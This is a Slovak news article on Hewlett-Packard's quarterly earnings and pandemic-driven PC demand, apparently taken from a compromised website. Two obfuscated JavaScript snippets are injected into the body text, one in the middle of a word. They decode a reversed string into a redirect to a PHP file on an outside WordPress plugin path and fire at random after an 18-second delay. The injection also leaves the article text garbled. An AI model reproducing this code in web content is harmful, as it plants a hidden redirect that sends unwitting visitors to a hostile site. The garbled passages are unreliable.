hp

Hewlett-Packard prekonala tržbami očakávania. Akcie posilňujú o päť percent

Hoci zisk aj tržby spoločnosti Hewlett-Packard v druhom tohtoročnom štvrťroku medziročne klesli, firma prekonala očakávania trhu. V prípade predajov dokonca o jednu miliardu dolárov. Akcie na priaznivé správy reagovali päťpercentným rastom.

Tržby HP medziročne poklesli o dve percentá na 14,3 miliardy dolárov. Lenže trhový konsenzus bol ešte o miliardu nižší. Zisk spoločnosti klesol z vlaňajších 1,2 miliardy na 734 miliónov. Ani to však nie je trhom vnímané negatívne. Spoločnosti HP totiž paradoxne pomohla sama Koronavírusová pdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andémia.

Predaje počítačov boli skvelé. Stali sa totiž neoddeliteľnou súčasťou našich životov. Vidíme trend, kedy predtým boli v domácnosti jeden až dva počítače, dnes už sa to blíži skôr jednému počítaču na každého člena domácnosti. Počítače sú totiž potrebné ako k práci, tak ku vzdelávaniu,uviedol výkonný riaditeľ HP Enrique Lores pre portál Marketwatch.com. Dopyt po $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom/“>počítačoch vraj navyše stále rastie.

Vysvetliť sa to dá tým, že sa ľudia možno pripravujú na príchod druhej vlny epidémie, a tak nechcú byť zaskočení, ak by boli nútení zostať v karanténe. Jarná kríza ukázala, že bez počítača alebo iného zariadenia pripojiteľného k internetu, sú ľudia v karanténe značne hendikepovaní a oveľa viac ohrození stratou zamestnania a príjmov.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *